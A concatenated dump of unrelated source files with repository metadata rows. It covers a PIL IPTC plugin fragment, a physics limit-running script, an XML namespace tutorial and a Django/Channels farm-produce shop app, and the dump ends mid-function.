            # re-open the extracted file with the regular PIL loaders
            with Image.open(outfile) as _im:
                _im.load()
                self.im = _im.im
        finally:
            # always remove the temporary file, even if loading failed
            try:
                os.unlink(outfile)
            except OSError:
                pass
# Register the plugin and its file extension with PIL's loader machinery.
Image.register_open(IptcImageFile.format, IptcImageFile)
Image.register_extension(IptcImageFile.format, ".iim")
def getiptcinfo(im):
    """
    Get IPTC information from TIFF, JPEG, or IPTC file.

    :param im: An image containing IPTC data.
    :returns: A dictionary containing IPTC information, or None if
        no IPTC information block was found.
    """
    import io

    from . import JpegImagePlugin, TiffImagePlugin

    data = None

    if isinstance(im, IptcImageFile):
        # return info dictionary right away
        return im.info

    elif isinstance(im, JpegImagePlugin.JpegImageFile):
        # extract the IPTC/NAA resource (Photoshop resource id 0x0404)
        photoshop = im.info.get("photoshop")
        if photoshop:
            data = photoshop.get(0x0404)

    elif isinstance(im, TiffImagePlugin.TiffImageFile):
        # get raw data from the IPTC/NAA tag (PhotoShop tags the data
        # as 4-byte integers, so we cannot use the get method...)
        try:
            data = im.tag.tagdata[TiffImagePlugin.IPTC_NAA_CHUNK]
        except (AttributeError, KeyError):
            pass

    if data is None:
        return None  # no properties

    # create an IptcImagePlugin object without initializing it
    class FakeImage:
        pass

    im = FakeImage()
    im.__class__ = IptcImageFile  # reuse IptcImageFile's parser on a bare object

    # parse the IPTC information chunk
    im.info = {}
    im.fp = io.BytesIO(data)

    try:
        im._open()
    except (IndexError, KeyError):
        pass  # expected failure
    return im.info
| [
"88698739+Sankalpa830@users.noreply.github.com"
] | 88698739+Sankalpa830@users.noreply.github.com |
f5800ecfc3419ee1d3066b980a2439658b3d7d09 | 8b2b07aff10727a00e243766458412f01393b524 | /Limits/python/combineUtils.py | 0b489f9add3d8339a4567175a69df32482f44938 | [] | no_license | adeiorio/Stat | 89db0deadbcca01a9204800a46a837a8cf0acd45 | f3968faca0cf72dff7abfdc26bcf2f63ec9fd6a0 | refs/heads/master | 2022-12-07T11:31:09.958027 | 2022-11-22T10:18:31 | 2022-11-22T10:18:31 | 298,411,783 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 5,547 | py | import os
import subprocess
from Stat.Limits.settings import *
def runCombine(cmdStr, logFile):
    "run combine for a specific case"
    # NOTE: Python 2 module (print statements). The command is executed through
    # the shell with stdout/stderr tee'd into logFile.
    cmd = (cmdStr)  # parentheses are redundant -- cmd is simply cmdStr
    print os.getcwd()
    print cmd
    #writer = open(logFile, 'w')
    #process = subprocess.call(cmd, shell = True, stdout=writer)
    print cmd + " 2>&1 | tee " + logFile
    # NOTE(review): shell string is built by concatenation -- safe only for
    # trusted, internally generated arguments.
    os.system(cmd + " 2>&1 | tee " + logFile)
    return
def runSinglePoint(path_, mZprime, mDark, rinv, alpha, categories, method, runSingleCat):
    """Run the asymptotic limit for one SVJ signal point (mZprime, mDark, rinv, alpha).

    Combines the per-category datacards into one card when several categories
    are given, runs the combined limit, and optionally runs each category on
    its own.

    NOTE(review): uses a module-global ``opt`` (opt.syst) that is not defined
    in this file -- presumably provided via ``from Stat.Limits.settings import *``
    or by the calling script; confirm.
    """
    print "evaluate limit for mZprime = ", mZprime, " GeV, mDark = ", mDark, " GeV, rinv = ", rinv, " , alpha = ", alpha
    path = ("%s/%s_mDark%s_rinv%s_alpha%s" % (path_, mZprime, mDark, rinv, alpha) )
    print "path: ", path
    if(os.path.exists(path)):
        os.chdir(path)
        if len(categories)>1:
            # Merge the per-category datacards into a single combined card.
            cmd = "combineCards.py SVJ_mZprime%s_mDark%s_rinv%s_alpha%s_*_%s.txt > SVJ_mZprime%s_mDark%s_rinv%s_alpha%s_%s.txt" % (mZprime, mDark, rinv, alpha, method, mZprime, mDark, rinv, alpha, method)
            print cmd
            os.system(cmd)
        # Combined asymptotic limit for this signal point. (The backslash below
        # is a line continuation inside the string literal, yielding " -m ".)
        runCombine("combine -M Asymptotic -n SVJ_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + " -\
m " + mZprime + " SVJ_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + "_" + method + ".txt", "asymptotic_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + "_" + method + ".log")
        for cat in categories:
            print "category: " + (cat)
            cat = cat+"_"+method
            if(runSingleCat): runCombine("combine -M Asymptotic -S " + opt.syst + " -n SVJ_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + "_" + cat + " -m" + mZprime + " SVJ_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + "_" + cat +".txt", "asymptotic_mZprime" + mZprime + "_mDark" + mDark + "_rinv" + rinv + "_alpha" + alpha + "_" + cat + ".log")
            #if(runSingleCat and opt.sig > 0):
            #    runCombine("combine -M ProfileLikelihood -S " + opt.syst + " -n SVJ" + post + " -m %s --signif --pvalue -t 1000 --toysFreq --expectSignal=1 SVJ" + post + ".txt", "profileLikelihood" + post + ".log")
        os.chdir("..")
def runSinglePointWprime(path_, mWprime, width, chir, categories, method, runSingleCat, unblind):
    """Combine per-category/per-year W' datacards and run AsymptoticLimits.

    *unblind* toggles the Asimov option: blinded runs add ``-t -1``.
    NOTE(review): *years* is not a parameter -- presumably it comes from the
    star-import of Stat.Limits.settings at the top of this module; confirm."""
    mass=mWprime
    print "evaluate limit for mWprime = ", mWprime, " GeV"
    path = ("%s/WP_M%sW%s_%s" % (path_, mass, width, chir) )
    print "==>path: ", path
    print os.path.exists(path)
    extraoption = " -t -1 "
    if unblind:
        extraoption=""
    if(os.path.exists(path)):
        print "ok i'm in the directory"
        os.chdir(path)
        print "We are in the right folder ", len(categories)
        if len(categories)>=1:
            if len(years)>1:
                # All years and categories merged into one combined card.
                cmd = "combineCards.py "
                for year in years:
                    for cat in categories:
                        cmd += cat+year+"=WP_M%sW%s_%s_%s_%s_%s.txt " %(mass, width, chir, cat, year, method)
                cmd += "> WP_M%sW%s_%s_%s.txt" % (mass, width, chir, method)
                print cmd
                os.system(cmd)
                runCombine("combine -M AsymptoticLimits "+extraoption+" -n WP_M"+mass+"W"+width+ "_" + chir + "_" + method + " -m" + mass + " WP_M"+mass+"W"+width+"_" + chir + "_" + method + ".txt", "asymptotic_WP_M" + mass + "W" + width + "_" + chir + "_" + method + ".log")
            else:
                # Single year: merge only the categories for that year.
                for year in years:
                    cmd = "combineCards.py "
                    for cat in categories:
                        cmd += cat+"=WP_M%sW%s_%s_%s_%s_%s.txt " %(mass, width, chir, cat, year, method)
                    cmd += "> WP_M%sW%s_%s_%s.txt" % (mass, width, chir, method)
                    print cmd
                    os.system(cmd)
                    runCombine("combine -M AsymptoticLimits "+extraoption+" -n WP_M"+mass+"W"+width+ "_" + chir + "_" + method + " -m" + mass + " WP_M"+mass+"W"+width+"_" + chir + "_" + method + ".txt", "asymptotic_WP_M" + mass + "W" + width + "_" + chir + "_" + method + ".log")
            if(runSingleCat):
                # NOTE(review): *year* here is whatever value the loops above
                # left behind (their last iteration) -- confirm this is intended
                # when len(years) > 1.
                for cat in categories:
                    print "category: " + (cat)
                    cat = cat+"_"+year+"_"+method
                    print "WP_M"+mass+"W"+width+"_" + chir + "_" + cat +".txt"
                    print "combine -M Asymptotic "+extraoption+" -n WP_M"+mass+"W"+width+ "_" + chir + "_" + cat + " -m" + mass + " WP_M"+mass+"W"+width+"_" + chir + "_" + cat +".txt", "asymptotic_WP_M" + mass + "W" + width + "_" + chir + "_" + cat + ".log"
                    runCombine("combine -M AsymptoticLimits "+extraoption+" -n WP_M"+mass+"W"+width+ "_" + chir + "_" + cat+ " -m" + mass + " WP_M"+mass+"W"+width+"_" + chir + "_" + cat +".txt", "asymptotic_WP_M" + mass + "W" + width + "_" + chir + "_" + cat + ".log")
        else:
            for year in years:
                for cat in categories:
                    print "category: " + (cat)
                    cat = cat+"_"+year+"_"+method
                    if(runSingleCat): runCombine("combine -M AsymptoticLimits "+extraoption+" -n WP_M"+mass+"W"+width+ "_" + chir + "_" + cat+ " -m" + mass + " WP_M"+mass+"W"+width+"_" + chir + "_" + cat +".txt", "asymptotic_WP_M" + mass + "W" + width + "_" + chir + "_" + cat + ".log")
    # NOTE(review): runs even if *path* did not exist (no matching chdir(path)).
    os.chdir("..")
| [
"adeiorio@cern.ch"
] | adeiorio@cern.ch |
df42a53a9946c65aa65daf196e5ae7312595f312 | 3640d0ce7e461aaebe6452ac426e4d9c2c2a0f39 | /ch6/namespace_xml.py | c0e61259445f8b40eb1bf905c168ff0cd1bb48eb | [] | no_license | chhhaya/pythonlearn | c50fb2ff019fb5558095de358467b58b570e021b | 3589cfcaee8aacaf4641a6ad27b21147d6890ce7 | refs/heads/master | 2021-01-01T18:30:04.548920 | 2015-02-10T13:33:36 | 2015-02-10T13:33:36 | 27,026,285 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,702 | py | from xml.etree.ElementTree import parse, iterparse
doc = parse('namespace.xml')
# Un-namespaced elements can be addressed by bare tag name.
print(doc.findtext('author'))
print(doc.find('content'))
# Fails: the <html> child is in the XHTML namespace, so a bare tag does not match.
print(doc.find('content/html'))
# None
# Works: namespaced tags must be qualified with the full {uri} Clark notation.
print(doc.find('content/{http://www.w3.org/1999/xhtml}html'))
# find
# Every step inside the namespace needs the qualifier, not just the first one.
print(doc.find('content/{http://www.w3.org/1999/xhtml}html/head/title'))
# None
print(doc.find('content/{http://www.w3.org/1999/xhtml}html/'
               '{http://www.w3.org/1999/xhtml}head/'
               '{http://www.w3.org/1999/xhtml}title'))
# find
class XMLNamespaces:
    """Expand short namespace prefixes into ElementTree's {uri} Clark notation.

    Instances are callable: ``ns('content/{html}html')`` replaces each
    registered prefix (here ``html``) with its full ``{uri}`` form so the
    result can be handed to ``Element.find()``/``findtext()``.
    """

    def __init__(self, **kwargs):
        self.namespaces = {}
        # Register every prefix=uri pair handed to the constructor.
        for prefix, uri in kwargs.items():
            self.register(prefix, uri)

    def register(self, name, uri):
        """Remember *name* as shorthand for ``{uri}``."""
        self.namespaces[name] = "{" + uri + "}"

    def __call__(self, path):
        """Return *path* with every {prefix} placeholder expanded."""
        return path.format_map(self.namespaces)
ns = XMLNamespaces(html='http://www.w3.org/1999/xhtml')
# The helper lets us write short {html} prefixes instead of full URIs.
print(doc.find(ns('content/{html}html')))
# find
print(doc.findtext(ns('content/{html}html/{html}head/{html}title')))
# Hello world
print('--'*10)
# iterparse with 'start-ns'/'end-ns' events reports namespace declarations as
# they are entered and left -- useful for tracking prefix->uri mappings while
# streaming a document.
for evt, elem in iterparse('namespace.xml', ('start', 'end', 'start-ns', 'end-ns')):
    print(evt, elem)
# end <Element 'author' at 0x102231098>
# start-ns ('', 'http://www.w3.org/1999/xhtml')
# end <Element '{http://www.w3.org/1999/xhtml}title' at 0x102231228>
# end <Element '{http://www.w3.org/1999/xhtml}head' at 0x1022311d8>
# end <Element '{http://www.w3.org/1999/xhtml}h1' at 0x1022312c8>
# end <Element '{http://www.w3.org/1999/xhtml}body' at 0x102231278>
# end <Element '{http://www.w3.org/1999/xhtml}html' at 0x102231188>
# end-ns None
# end <Element 'content' at 0x1022310e8>
# end <Element 'top' at 0x10222cf98>
### lxml is recommended for handling more complex namespace situations
"chhaya11@163.com"
] | chhaya11@163.com |
d0c7805015d0990484841901a310a10805e00cf6 | 39be02fe4f8e8362a7acc005f3e30dd6fe47990e | /newdata/oylereader.py | 5ebdae4fcc852f8c821d74ed40ee95c9b06e915b | [] | no_license | seferlab/geneexpress | e2f6fdaa49e40cd48d0572cd9ddb5d2f45566adb | ac35bde5ba52d24981ece74e532f46bbfff9019e | refs/heads/master | 2022-12-19T08:33:16.925160 | 2020-09-29T13:51:30 | 2020-09-29T13:51:30 | 299,619,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | import os
import sys
import math
fname1 = "127 LCM time course Data Not normalized.txt"
fname2 = "127 LCM time course Quantile Normalized logbased 2 transformed.txt"
# NOTE: Python 2 script (print statements, xrange).
# Each physical line read is split on "\r" and field 1 of that split is
# tab-separated -- presumably the files carry CR-separated records inside one
# physical line; confirm against the actual data files.
with open(fname1,"r") as infile:
    for line in infile:
        line = line.rstrip()
        vals = line.split("\r")
        splitted = vals[1].split("\t")
        # items1 is reassigned on every iteration, so after the loop it holds
        # only the values parsed from the final line read.
        items1 = [float(splitted[tind]) for tind in xrange(1,len(splitted))]
with open(fname2,"r") as infile:
    for line in infile:
        line = line.rstrip()
        vals = line.split("\r")
        splitted = vals[1].split("\t")
        # Same pattern: items2 keeps only the last line's values.
        items2 = [float(splitted[tind]) for tind in xrange(1,len(splitted))]
# Compare the raw values against log2 transforms and against the
# quantile-normalized file's values.
print items1[0:20]
print [math.log(titem,2.0) for titem in items1[0:10]]
print [math.log(titem+1.0,2.0) for titem in items1[0:10]]
print items2[0:20]
print items1[8:20]
"70752445+seferlab@users.noreply.github.com"
] | 70752445+seferlab@users.noreply.github.com |
0a8292376d38f8cb8f4dcc03a49cad69ea965165 | c384c1f8062f01a6a343e4aad7fcd231a906dbf5 | /python/How many char in it.py | 7bbe3199b90ea812ec236302dcec20ed4fb4c100 | [] | no_license | RawitSHIE/Algorithms-Training-Python | b9bf95ccc7b3974de78f290492d646679d05ae4b | 02ba71f88d18e48b35046564fe6f61911db31ac4 | refs/heads/master | 2021-03-24T12:34:02.101117 | 2017-12-10T14:15:40 | 2017-12-10T14:15:40 | 109,127,600 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 942 | py | """How many char in it"""
def main():
"""chr count"""
text = list(input())
lower, upper, nlow, nup = [], [], [], []
alpha = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")
for i in range(len(alpha)):
if alpha[i] in text:
text2 = sorted(set(text))
for j in range(len(text2)):
if text2[j] in 'abcdefghijklmnopqrstuvwxyz':
lower.append(text2[j])
nlow.append(text.count(text2[j]))
elif text2[j] in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
upper.append(text2[j])
nup.append(text.count(text2[j]))
lista = lower + upper
listb = nlow + nup
for k in range(len(lista)):
print(lista[k],":" , listb[k])
break
elif not(alpha[len(alpha)-1] in text):
print("\\@#!$#'\\\\\"$!%&{\"")
break
main()
| [
"Rawitgun@gmail.com"
] | Rawitgun@gmail.com |
52860b1da6917fcd830a4b178bd3d28e8c60bf70 | 99dfd25f07b748e0b9b04ac300e135dc20570e1c | /cart/urls.py | 1731b6a31f6bbea06b4fcbb367549265a3127dd2 | [] | no_license | suipingooi/tgc10-django-deploy-checkpointPAUL | 1ec45e7135263703ff3472216f8fdcfdb379d7f3 | 46b62cdce8396c2b0cc57ec1fca4e77c0eee1e1a | refs/heads/master | 2023-04-16T05:11:20.535480 | 2021-04-14T12:02:43 | 2021-04-14T12:02:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | from django.urls import path
import cart.views
urlpatterns = [
    # Add book <book_id> to the cart.
    path('add/<book_id>', cart.views.add_to_cart,
         name="add_to_cart"),
    # Cart landing page.
    path('', cart.views.view_cart, name='view_cart'),
    # Remove a single book from the cart.
    path('remove/<book_id>', cart.views.remove_from_cart,
         name="remove_from_cart"),
    # Change the quantity of a book already in the cart.
    path('update_quantity/<book_id>', cart.views.update_quantity,
         name="update_cart_quantity")
]
| [
"chorkunxin@yahoo.com"
] | chorkunxin@yahoo.com |
41dabe5b0e30f6ff89cb7846901f93f3873942e9 | 47c6de7d0e3c90493af4b026914cf5386e27fc5b | /mainserver/consumers.py | 293e2c0c232845ff25eac232d0721930d1ce71f8 | [] | no_license | bvishal8510/saemain | b97676916efcd4d5987aa7943834ad5f4455ecc5 | 3b812a2f24ada3435735d92058c4aba4e0c6eed5 | refs/heads/master | 2020-03-11T10:28:11.708212 | 2018-05-07T06:06:42 | 2018-05-07T06:06:42 | 129,943,695 | 0 | 0 | null | 2019-10-21T15:33:51 | 2018-04-17T17:50:08 | Python | UTF-8 | Python | false | false | 2,879 | py | import json
from channels import Group, Channel
from channels.auth import channel_session_user, channel_session_user_from_http
from .models import User_main
from django.core import serializers
@channel_session_user_from_http
def ws_connect(message):
    # Channels 1.x connect handler; currently a no-op -- the accept/session
    # setup code is commented out below, so sockets are neither explicitly
    # accepted nor rejected here.
    pass
# print(4)
# message.reply_channel.send({"accept": True})
# message.channel_session['rooms'] = []
# # print(dict(message))
# @channel_session_user
def ws_disconnect(message):
    # Channels 1.x disconnect handler; currently a no-op -- the room-membership
    # cleanup that belongs here is commented out below.
    pass
# print(5)
# for room_id in message.channel_session.get("rooms", set()):
# try:
# room = Room.objects.get(pk=room_id)
# room.websocket_group.discard(message.reply_channel)
# except Room.DoesNotExist:
# pass
def ws_receive(message):
    # Channels 1.x receive handler; currently a no-op -- dispatch of the JSON
    # payload to the "chat.receive" channel is commented out below.
    pass
# print(6)
# payload = json.loads(message['text'])
# payload['reply_channel'] = message.content['reply_channel']
# Channel("chat.receive").send(payload)
# @catch_client_error
# @channel_session_user
# def chat_join(message):
# print(7)
# l1=[]
# l2=[]
# room = get_room_or_error(message["room"], message.user)
# if NOTIFY_USERS_ON_ENTER_OR_LEAVE_ROOMS:
# room.send_message(None, message.user, MSG_TYPE_ENTER)
# log = Comments.objects.filter(room=message["room"])
# for l in log:
# l1.append(l.comment)
# l1.append(str(l.user))
# l2.extend([l1])
# l1=[]
# # log1 = serializers.serialize('json', log)
# # print("----",log1)
# # for i in log1:
# # print(i)
# # print("=========",log1)
# room.websocket_group.add(message.reply_channel)
# message.channel_session['rooms'] = list(set(message.channel_session['rooms']).union([room.id]))
# message.reply_channel.send({
# "text": json.dumps({
# "join": str(room.id),
# "title": room.title,
# "d":l2,
# }),
# })
# @channel_session_user
# @catch_client_error
# def chat_leave(message):
# print(9)
# room = get_room_or_error(message["room"], message.user)
# if NOTIFY_USERS_ON_ENTER_OR_LEAVE_ROOMS:
# room.send_message(None, message.user, MSG_TYPE_LEAVE)
# room.websocket_group.discard(message.reply_channel)
# message.channel_session['rooms'] = list(set(message.channel_session['rooms']).difference([room.id]))
# message.reply_channel.send({
# "text": json.dumps({
# "leave": str(room.id),
# }),
# })
# @catch_client_error
# @channel_session_user
# def chat_send(message):
# print(10)
# if int(message['room']) not in message.channel_session['rooms']:
# raise ClientError("ROOM_ACCESS_DENIED")
# room = get_room_or_error(message["room"], message.user)
# Comments.objects.create(room = message["room"],user=message.user, comment=message["message"])
# room.send_message(message["message"], message.user) | [
"baghel.vishal124124@gmail.com"
] | baghel.vishal124124@gmail.com |
236fc4fd5bc7b69db58de748d2cb1eace6d41786 | bc52ee3856ada8acff0378298a2b8a8960c7c9db | /venv/bin/tox | bf7d98656f6f04fa08dd8a3578368f83260d30b5 | [] | no_license | Alone-elvi/e-lib-Flask | 345f71a60cb8480fa04364924a9ee4c997ab8c2b | 1a25a353aa6fbfd37d0af5255651943e7c941581 | refs/heads/master | 2022-12-12T13:17:05.356615 | 2019-08-04T15:05:25 | 2019-08-04T15:05:25 | 200,500,629 | 0 | 1 | null | 2022-12-08T05:58:25 | 2019-08-04T14:09:33 | Python | UTF-8 | Python | false | false | 263 | #!/home/alone5elvi/MEGA/Programming/Python/Flask/e-lib/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from tox import cmdline
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(cmdline())
| [
"alone.elvi@gmail.com"
] | alone.elvi@gmail.com | |
0d3751111c62a6939a15a28d136ea4746c6a9726 | 6ff62bd52c889483dd2445d6c7c7239d8ac8f870 | /NBIOT_position_system/real_time_monitoring/migrations/0002_auto_20180330_1049.py | 2d7958a34fd7c73b83eb81ad53dacccdf9b94fb6 | [] | no_license | zhangc-rw/position_service | 830c1e5fbf4d9bc4a307aa663d4193dc0214f5b7 | 104b81dc40ff777a94ee18ff63422c89c5a20cf3 | refs/heads/master | 2020-03-12T13:37:52.967126 | 2018-12-06T08:18:30 | 2018-12-06T08:18:30 | 130,646,760 | 0 | 1 | null | 2018-04-24T01:35:52 | 2018-04-23T05:55:45 | Python | UTF-8 | Python | false | false | 968 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-03-30 02:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Schema tweaks for real_time_monitoring.Target: add carrier_name and sex,
    and give height/velocity a '0' default."""
    dependencies = [
        ('real_time_monitoring', '0001_initial'),
    ]
    operations = [
        # New free-text carrier name, empty by default.
        migrations.AddField(
            model_name='target',
            name='carrier_name',
            field=models.CharField(default='', max_length=100),
        ),
        # New sex field; the default literal is Chinese for "male".
        migrations.AddField(
            model_name='target',
            name='sex',
            field=models.CharField(default='男', max_length=15),
        ),
        migrations.AlterField(
            model_name='target',
            name='height',
            field=models.CharField(default='0', max_length=20),
        ),
        migrations.AlterField(
            model_name='target',
            name='velocity',
            field=models.CharField(default='0', max_length=20),
        ),
    ]
"1031145995@qq.com"
] | 1031145995@qq.com |
c30e714db427687e2c49b5ae2143f6f504edbc8c | 50cf35543575af09e99f8b7ab88d47dbf16aede0 | /server/products/urls.py | 7c08d700d462ebf8c2698a91371b3329733928c3 | [] | no_license | igrmaurat/GB_Django | b0949f45e75c5ab009f17752670ded25c551a52e | 555377a36f4e69c82060d9f6dc4ee7a9252d8260 | refs/heads/master | 2020-04-02T00:43:50.165667 | 2018-12-03T14:10:13 | 2018-12-03T14:10:13 | 153,818,946 | 0 | 0 | null | 2018-12-03T14:10:14 | 2018-10-19T17:31:15 | Python | UTF-8 | Python | false | false | 492 | py | from django.urls import path
# Импортируем свою функцию
from .views import (
catalog,
product,
product_create,
product_update,
product_delete
)
app_name = 'products'
urlpatterns = [
    # CRUD routes for a single product, keyed by primary key.
    path('<int:pk>/delete', product_delete, name = 'delete'),
    path('<int:pk>/update', product_update, name = 'update'),
    path('create/', product_create, name = 'create'),
    # Catalog listing at the app root; product detail page by pk.
    path('', catalog, name="catalog"),
    path('<int:pk>/', product, name="product"),
]
| [
"igrmaurat@mail.ru"
] | igrmaurat@mail.ru |
ad37fcf92859439197f53e93bff59cfbc036b3fc | 065a25701273fa6be10d41ceca24148c6442f02f | /FarMeKart/views.py | ee35917e11a61bf7a0b1778e57d6a8756f44c5b7 | [] | no_license | Gunapriya6/FarMeKart | 980cfffe08a15c21b90e6886d411df361165df63 | 551d3053365c5581de414ff2165e2e807c43b13c | refs/heads/master | 2023-06-07T19:54:36.011198 | 2021-06-29T12:15:54 | 2021-06-29T12:15:54 | 376,298,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,795 | py | from django.shortcuts import render,redirect
from FarMeKart.forms import UsregFo,ChpwdForm,UpdPfle,Vegfr,UpdVgtab,Userp,Usperm,UpdPfle1,CancelForm,UpdPfle2,PlaceorderForm
from django.contrib.auth.decorators import login_required
from farmer import settings
from django.core.mail import send_mail
from django.core.mail import EmailMessage
from django.contrib.auth.models import User,AbstractUser
from FarMeKart.models import Vegpro,User,Cart,Myorders,Orders
import sys
from django.contrib import messages
import secrets
from django.contrib.auth import authenticate,login
from django.http import HttpResponse
def quantity(request,id):
    # Bump the quantity of cart row *id* by one, then return to the cart page.
    # ("qunatity" is the field's actual -- misspelled -- name, as used
    # consistently throughout this module; confirm against models.py.)
    c=Cart.objects.get(id=id)
    c.qunatity=c.qunatity+1
    c.save()
    return redirect('/cartdetails')
def remqun(request,id):
    # Decrease the quantity of cart row *id* by one.
    # NOTE(review): no lower bound -- repeated clicks can drive the quantity to
    # zero or negative; confirm whether the row should be removed instead.
    c=Cart.objects.get(id=id)
    c.qunatity=c.qunatity-1
    c.save()
    return redirect('/cartdetails')
@login_required
def delivery(request):
    # Producer view: this user's orders (prod == current user id) that are
    # still undelivered (is_status == 0).
    c=Myorders.objects.filter(prod=request.user.id,is_status=0)
    return render(request,'html/delivery.html',{'de':c})
def dell(request,id):
    # Mark order *id* as delivered (is_status = 1) and go back to the list.
    c=Myorders.objects.get(id=id)
    c.is_status=1
    c.save()
    return redirect('/delivery')
def Login_user(request):
    """Authenticate the posted username/password; on success log the user in
    and redirect home, otherwise re-render the login page with a warning."""
    if request.method=='POST':
        username=request.POST.get('username')
        password=request.POST.get('password')
        user=authenticate(request,username=username,password=password)
        if not user:
            messages.add_message(request,messages.WARNING,'invalid Credentials')
            return render(request,'html/login.html')
        else:
            login(request,user)
            messages.add_message(request,messages.SUCCESS,f'Thank You {user.username}. Visit again...!')
            return redirect('/')
    # GET (or any non-POST) just shows the form.
    return render(request,'html/login.html')
def remove(request,id):
    # Delete cart row *id* outright, then refresh the cart page.
    c=Cart.objects.get(id=id)
    c.delete()
    return redirect('/cartdetails')
def contact(re):
return render(re,"html/contact.html")
def about(re):
return render(re,"html/about.html")
def registration(request):
    """Handle the sign-up form.

    On a valid POST: generate a short hex id, email a welcome message, and
    persist the new user only if the mail was actually sent (send_mail == 1).
    """
    if request.method=="POST":
        k = UsregFo(request.POST)
        if k.is_valid():
            e = k.save(commit=False)
            # 6-hex-digit public identifier included in the welcome mail.
            e.idgen = secrets.token_hex(3)
            sb = "FarMeKart"
            mg = "Hi Welcome{}. You have successfully registered for FarMeKart portal. Your id is {}.".format(e.username,e.idgen)
            sd = settings.EMAIL_HOST_USER
            snt = send_mail(sb,mg,sd,[e.email])
            if snt == 1:
                e.save()
                return redirect('/lg')
            else:
                # Mail delivery failed: the user is NOT saved.
                return redirect('/')
    # NOTE(review): on an invalid POST this falls through and re-renders a
    # *blank* form, discarding the validation errors.
    k=UsregFo()
    return render(request,'html/register.html',{'h':k})
@login_required
def cgf(re):
if re.method=="POST":
c=ChpwdForm(user=re.user,data=re.POST)
if c.is_valid():
c.save()
return redirect('lg/')
c=ChpwdForm(user=re.user)
return render(re,'html/changepassword.html',{'t':c})
@login_required
def profile(req):
return render(req,'html/profile.html')
@login_required
def updprofile(request):
if request.method == "POST":
t = UpdPfle(request.POST,instance=request.user)
if t.is_valid():
t.save()
return redirect('/pro')
t = UpdPfle(instance=request.user)
return render(request,'html/updateprofile.html',{'z':t})
@login_required
def dashboard(re):
return render(re,'html/dashboard.html')
@login_required
def farmerdashboard(request):
return render(request,'html/farmerdashboard.html')
@login_required
def vegf(request):
t = Vegpro.objects.filter(a_id=request.user.id)
if request.method == "POST":
s = Vegfr(request.POST,request.FILES)
if s.is_valid():
r = s.save(commit=False)
r.a_id = request.user.id
r.save()
return redirect('/dt')
s=Vegfr()
return render(request,'html/data.html',{'a':s,'e':t})
@login_required
def infodelete(req,et):
data=Vegpro.objects.get(id=et)
print(data.id)
if req.method == "POST":
print(data.id)
data.delete()
return redirect('/dt')
return render(req,'html/userdelete.html',{'sd':data})
def itemupdate(request,y):
dc = Vegpro.objects.get(id=y)
if request.method == "POST":
m = UpdVgtab(request.POST,request.FILES,instance=dc)
if m.is_valid():
m.save()
return redirect('/dt')
m = UpdVgtab(instance=dc)
return render(request,'html/updateuser.html',{'e':m})
def items(request):
i = Vegpro.objects.filter(a_id=request.user.id)
data=Vegpro.objects.all()
for j in i:
print(j.item_name)
s = Vegpro.objects.all()
k = {}
for m in s:
g = User.objects.get(id=m.a_id)
k[m.id] = m.item_type,m.item_name,m.quantity,m.fname,m.price,m.impf,m.market_price,m.is_stock,m.create_date,g.username
f = k.values()
return render(request,'html/cart.html',{'data':data,'d':f})
def addcart(request,id):
r=Vegpro.objects.get(id=id)
if request.method == 'POST':
p=Cart(user_id=request.user.id,veg_id=id)
p.save()
return redirect("/cartdetails")
return render(request,'html/cart.html',{'data':r})
def usr(re):
s=Userp()
return render(re,'html/user.html',{'a':s})
def requestform(request):
if request.method=="POST":
u=request.POST.get('uname')
e=request.POST.get('email')
ut=request.POST.get('utype')
ud=request.POST.get('uid')
ms=request.POST.get('msg')
f=request.FILES['fe']
a="Hi welcome "+u+"<br/>" "Requested your Role as "+ut+"<br/>" "Your ID is:"+ud
t = EmailMessage("UserRole Change",a,settings.EMAIL_HOST_USER,[settings.ADMINS[0][1],e])
t.content_subtype='html'
t.attach(f.name,f.read(),f.content_type)
t.send()
if t==1:
return redirect('/reqp')
else:
return redirect('/lg')
return render(request,'html/requestp.html')
def adminpermissions(request):
ty=User.objects.all()
return render(request,'html/adminpermissions.html',{'q':ty})
def updatepermissions(request,k):
r=User.objects.get(id=k)
if request.method == "POST":
k=Usperm(request.POST,instance=r)
if k.is_valid():
k.save()
return redirect('/gper')
k2= Usperm(instance=r)
return render(request,'html/updatepermissions.html',{'y':k2})
def updateprofile(request):
return render(request,'html/profileupdate.html')
def orgupdate(request):
z=User.objects.get(id=request.user.id)
if request.method == "POST":
p=UpdPfle1(request.POST,instance=z)
q=UpdPfle2(request.POST,instance=z)
r=UpdPfle(request.POST,instance=z)
if p.is_valid() and q.is_valid() and r.is_valid():
p.save()
q.save()
r.save()
return redirect('/profile')
p=UpdPfle1(instance=z)
q=UpdPfle2(instance=z)
r=UpdPfle(instance=z)
return render(request,'html/updatedetails.html',{'u':p,'p':q,'k':r})
def userdelete(request, id):
    """Delete the User with primary key *id*, then return to the permissions page.

    Bug fix: the original called ``c.save()`` right after ``c.delete()``.
    In Django, ``Model.delete()`` clears the instance's primary key, so the
    subsequent ``save()`` performed an INSERT that resurrected the user as a
    fresh row.  Dropping the save makes the deletion stick.
    """
    c = User.objects.get(id=id)
    c.delete()
    return redirect('/gper')
def addcart(request,id):
    # NOTE(review): this re-definition replaces the addcart() declared earlier
    # in this module -- only this later version is bound at import time.
    b=Vegpro.objects.get(id=id)   # fetched but unused; the template receives the Cart row as 'b'
    c=Cart(user_id=request.user.id,veg_id=id)
    c.save()
